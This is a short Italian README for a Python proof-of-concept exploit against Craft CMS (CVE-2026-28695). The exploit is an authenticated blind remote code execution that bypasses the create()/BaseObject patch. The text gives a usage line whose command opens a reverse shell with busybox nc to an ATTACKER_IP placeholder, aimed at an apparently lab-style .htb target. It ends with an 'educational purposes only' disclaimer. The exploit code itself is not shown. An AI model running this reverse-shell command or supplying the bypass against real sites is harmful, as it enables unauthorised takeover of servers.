
Exploit PoC in Python per CVE-2026-28695, un RCE cieco autenticato in Craft CMS che aggira la patch create() di BaseObject e avvia una reverse shell.
Remote code execution cieco autenticato in Craft CMS. Aggira la restrizione create() - BaseObject aggiunta nella correzione di CVE-2026-28695 (commit e31e508).
python3 exp.py -t http://target.htb -u user -p 'password' -c 'busybox nc ATTACKER_IP ATTACKER_PORT -e /bin/sh'
Questo script è inteso solo a scopo educativo. L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo exploit. Assicurati sempre di avere il permesso prima di testare o sfruttare vulnerabilità!